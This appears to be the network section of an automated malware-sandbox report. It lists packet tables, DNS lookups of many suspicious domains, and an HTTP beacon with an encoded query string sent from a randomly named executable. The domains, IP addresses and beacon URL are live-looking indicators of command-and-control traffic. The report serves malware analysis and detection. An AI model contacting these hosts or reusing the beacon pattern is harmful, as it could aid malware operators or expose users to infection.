                                                              Sep 11, 2024 22:57:51.240914106 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.247910023 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.247983932 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.260771990 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.266109943 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.266141891 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.739876032 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.739948988 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.740242958 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.740384102 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.741251945 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:52.768558025 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.790010929 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.794823885 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:53.798140049 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.805466890 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.810890913 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255080938 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255122900 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255278111 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:54.255424023 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:54.255424023 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:54.258163929 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:54.263158083 CEST8059713199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:58:07.501872063 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:07.507087946 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:07.507200003 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:07.519224882 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:07.524492025 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562009096 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562340021 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562354088 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562396049 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:08.562962055 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.562973976 CEST8059714188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:08.563045979 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:09.034169912 CEST5971480192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.053131104 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.057888985 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:10.058074951 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.068998098 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:10.073803902 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093650103 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093660116 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093668938 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093673944 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.093723059 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:11.094643116 CEST8059715188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:11.094693899 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:11.584609032 CEST5971580192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.600481987 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.605353117 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:12.605438948 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.618120909 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:12.623037100 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:12.623235941 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608714104 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608731985 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608746052 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608762026 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608776093 CEST8059716188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:13.608807087 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:13.608839989 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:14.130140066 CEST5971680192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.146958113 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.152082920 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:15.152158976 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.159970999 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:15.164824009 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140569925 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140666008 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140691996 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140728951 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140744925 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140760899 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140788078 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.140867949 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140883923 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140896082 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.140963078 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.140986919 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.141160965 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:16.141418934 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.145478010 CEST5971780192.168.2.7188.114.96.3
                                                              Sep 11, 2024 22:58:16.150657892 CEST8059717188.114.96.3192.168.2.7
                                                              Sep 11, 2024 22:58:24.842487097 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:24.847382069 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:24.847481966 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:24.854794025 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:24.859600067 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:25.784841061 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:25.785070896 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:25.786114931 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:25.787558079 CEST5971880192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:58:25.792289019 CEST8059718154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:58:30.803083897 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:30.808078051 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:30.808255911 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:30.819317102 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:30.824263096 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294392109 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294471025 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294512987 CEST8059719152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:31.294521093 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:31.294601917 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:32.331151962 CEST5971980192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.354095936 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.359709024 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.359841108 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.371570110 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:33.376394033 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815606117 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815907001 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815920115 CEST8059720152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:33.815989017 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:34.878098965 CEST5972080192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.896996975 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.902031898 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:35.902565956 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.914391994 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:35.919188976 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:35.919231892 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.357664108 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.358491898 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.358540058 CEST8059721152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:36.358539104 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:36.358608007 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:37.424885988 CEST5972180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.443581104 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.448772907 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.448869944 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.457194090 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.462110043 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909491062 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909596920 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909718037 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.909831047 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:38.909884930 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.912362099 CEST5972280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:58:38.917541981 CEST8059722152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:58:43.927836895 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:43.933916092 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:43.934058905 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:43.944741964 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:43.949486017 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:44.526738882 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:44.527240038 CEST805972323.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:44.527446032 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:45.456171989 CEST5972380192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.474658012 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.479532003 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:46.479634047 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.490766048 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:46.495534897 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:47.064145088 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:47.064449072 CEST805972423.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:47.064516068 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:48.003310919 CEST5972480192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.021569014 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.026563883 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.026958942 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.038165092 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:49.043617964 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.043647051 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.705274105 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.705399036 CEST805972523.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:49.705558062 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:50.550009012 CEST5972580192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.568464994 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.576209068 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:51.578162909 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.585516930 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:51.590404034 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.842560053 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.842576981 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.842736006 CEST5972680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:58:52.843014002 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.843027115 CEST805972623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:58:52.843080044 CEST5972680192.168.2.723.225.34.75

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 11, 2024 22:54:11.222034931 CEST6256753192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:54:12.902592897 CEST5237753192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:54:33.540538073 CEST53639611.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:54:46.860939980 CEST6165153192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:54:47.047838926 CEST53616511.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:55:03.023618937 CEST6272053192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:55:03.604156971 CEST53627201.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:55:16.755569935 CEST5045153192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:55:17.282279968 CEST53504511.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:55:30.572293997 CEST5936053192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:55:30.585302114 CEST53593601.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:55:43.724626064 CEST6303253192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:55:43.801392078 CEST53630321.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:55:57.304311037 CEST5120253192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:55:57.599092960 CEST53512021.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:56:11.380860090 CEST5257253192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:56:11.646955967 CEST53525721.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:56:25.115231037 CEST5429653192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:56:25.139343023 CEST53542961.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:56:38.508424044 CEST5034553192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:56:38.972678900 CEST53503451.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:56:52.225167990 CEST5760253192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:56:52.248512983 CEST53576021.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:05.603523016 CEST5226053192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:05.674679041 CEST53522601.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:18.959932089 CEST6306853192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:19.144625902 CEST53630681.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:32.521614075 CEST5540353192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:32.544328928 CEST53554031.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:45.678066969 CEST6465353192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:46.139832020 CEST53646531.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:57:59.272669077 CEST6492353192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:57:59.284287930 CEST53649231.1.1.1192.168.2.7
                                                              Sep 11, 2024 22:58:07.351028919 CEST5088653192.168.2.71.1.1.1
                                                              Sep 11, 2024 22:58:07.499408960 CEST53508861.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 11, 2024 22:54:11.222034931 CEST192.168.2.71.1.1.10x5277Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:54:12.902592897 CEST192.168.2.71.1.1.10x80d4Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:54:46.860939980 CEST192.168.2.71.1.1.10x6a80Standard query (0)www.57ddu.topA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:03.023618937 CEST192.168.2.71.1.1.10x802fStandard query (0)www.nuv3.topA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:16.755569935 CEST192.168.2.71.1.1.10x31cbStandard query (0)www.bashei.topA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:30.572293997 CEST192.168.2.71.1.1.10x203Standard query (0)www.tigre777gg.onlineA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:43.724626064 CEST192.168.2.71.1.1.10x7326Standard query (0)www.maya24.xyzA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:57.304311037 CEST192.168.2.71.1.1.10xdbf6Standard query (0)www.hiretemp.netA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:11.380860090 CEST192.168.2.71.1.1.10xe87eStandard query (0)www.justlivn.netA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:25.115231037 CEST192.168.2.71.1.1.10xad21Standard query (0)www.hemistryb.onlineA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:38.508424044 CEST192.168.2.71.1.1.10x13b4Standard query (0)www.jeandreo.storeA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:52.225167990 CEST192.168.2.71.1.1.10x1108Standard query (0)www.zimra.xyzA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:05.603523016 CEST192.168.2.71.1.1.10xb01Standard query (0)www.legitima.legalA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:18.959932089 CEST192.168.2.71.1.1.10xe25Standard query (0)www.autochemtools.comA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:32.521614075 CEST192.168.2.71.1.1.10x21dStandard query (0)www.thewhitediamond.orgA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:45.678066969 CEST192.168.2.71.1.1.10x36b6Standard query (0)www.personal-loans-jp8.xyzA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:59.272669077 CEST192.168.2.71.1.1.10x9a23Standard query (0)www.loveinpoeipet07.siteA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:58:07.351028919 CEST192.168.2.71.1.1.10xeee2Standard query (0)www.chinaen.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 11, 2024 22:54:11.391583920 CEST1.1.1.1192.168.2.70x5277No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:54:12.910535097 CEST1.1.1.1192.168.2.70x80d4No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:54:47.047838926 CEST1.1.1.1192.168.2.70x6a80No error (0)www.57ddu.top57ddu.topCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:54:47.047838926 CEST1.1.1.1192.168.2.70x6a80No error (0)57ddu.top154.23.184.218A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:03.604156971 CEST1.1.1.1192.168.2.70x802fNo error (0)www.nuv3.topnuv3.topCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:55:03.604156971 CEST1.1.1.1192.168.2.70x802fNo error (0)nuv3.top152.53.38.0A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:17.282279968 CEST1.1.1.1192.168.2.70x31cbNo error (0)www.bashei.top23.225.34.75A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:30.585302114 CEST1.1.1.1192.168.2.70x203No error (0)www.tigre777gg.onlinetigre777gg.onlineCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:55:30.585302114 CEST1.1.1.1192.168.2.70x203No error (0)tigre777gg.online3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:30.585302114 CEST1.1.1.1192.168.2.70x203No error (0)tigre777gg.online15.197.148.33A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:43.801392078 CEST1.1.1.1192.168.2.70x7326No error (0)www.maya24.xyzmaya24.xyzCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:55:43.801392078 CEST1.1.1.1192.168.2.70x7326No error (0)maya24.xyz65.108.194.49A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:55:57.599092960 CEST1.1.1.1192.168.2.70xdbf6No error (0)www.hiretemp.net208.91.197.13A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:11.646955967 CEST1.1.1.1192.168.2.70xe87eNo error (0)www.justlivn.netjustlivn.netCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:56:11.646955967 CEST1.1.1.1192.168.2.70xe87eNo error (0)justlivn.net76.223.113.161A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:25.139343023 CEST1.1.1.1192.168.2.70xad21No error (0)www.hemistryb.online172.67.221.5A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:25.139343023 CEST1.1.1.1192.168.2.70xad21No error (0)www.hemistryb.online104.21.24.234A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:38.972678900 CEST1.1.1.1192.168.2.70x13b4No error (0)www.jeandreo.storejeandreo.storeCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:56:38.972678900 CEST1.1.1.1192.168.2.70x13b4No error (0)jeandreo.store162.240.81.18A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:56:52.248512983 CEST1.1.1.1192.168.2.70x1108No error (0)www.zimra.xyz162.0.213.94A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:05.674679041 CEST1.1.1.1192.168.2.70xb01No error (0)www.legitima.legallegitima.legalCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:57:05.674679041 CEST1.1.1.1192.168.2.70xb01No error (0)legitima.legal84.32.84.32A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:19.144625902 CEST1.1.1.1192.168.2.70xe25No error (0)www.autochemtools.com35.214.33.204A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:32.544328928 CEST1.1.1.1192.168.2.70x21dNo error (0)www.thewhitediamond.orgthewhitediamond.orgCNAME (Canonical name)IN (0x0001)false
                                                              Sep 11, 2024 22:57:32.544328928 CEST1.1.1.1192.168.2.70x21dNo error (0)thewhitediamond.org3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:32.544328928 CEST1.1.1.1192.168.2.70x21dNo error (0)thewhitediamond.org15.197.148.33A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:46.139832020 CEST1.1.1.1192.168.2.70x36b6No error (0)www.personal-loans-jp8.xyz199.59.243.226A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:57:59.284287930 CEST1.1.1.1192.168.2.70x9a23Name error (3)www.loveinpoeipet07.sitenonenoneA (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:58:07.499408960 CEST1.1.1.1192.168.2.70xeee2No error (0)www.chinaen.org188.114.96.3A (IP address)IN (0x0001)false
                                                              Sep 11, 2024 22:58:07.499408960 CEST1.1.1.1192.168.2.70xeee2No error (0)www.chinaen.org188.114.97.3A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.57ddu.top
                                                              • www.nuv3.top
                                                              • www.bashei.top
                                                              • www.tigre777gg.online
                                                              • www.maya24.xyz
                                                              • www.hiretemp.net
                                                              • www.justlivn.net
                                                              • www.hemistryb.online
                                                              • www.jeandreo.store
                                                              • www.zimra.xyz
                                                              • www.legitima.legal
                                                              • www.autochemtools.com
                                                              • www.thewhitediamond.org
                                                              • www.personal-loans-jp8.xyz
                                                              • www.chinaen.org

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.759660154.23.184.218805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:54:47.076656103 CEST437OUTGET /3ozz/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=XDfkmZV0UpreXJRL4a+kMc+s40ElyBknavgDq4xpV4itK9/GJYtr4NsiaYcm7ir36wtKh4I9XU6sRfj+cMnrz2p6V2IZ5AA5gzUpK7TVcpLZf4ygGQ5VljQGU5XXJlbNz7qQtdD+VX81 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.57ddu.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:54:47.969984055 CEST312INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:54:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66a4adce-94"
                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
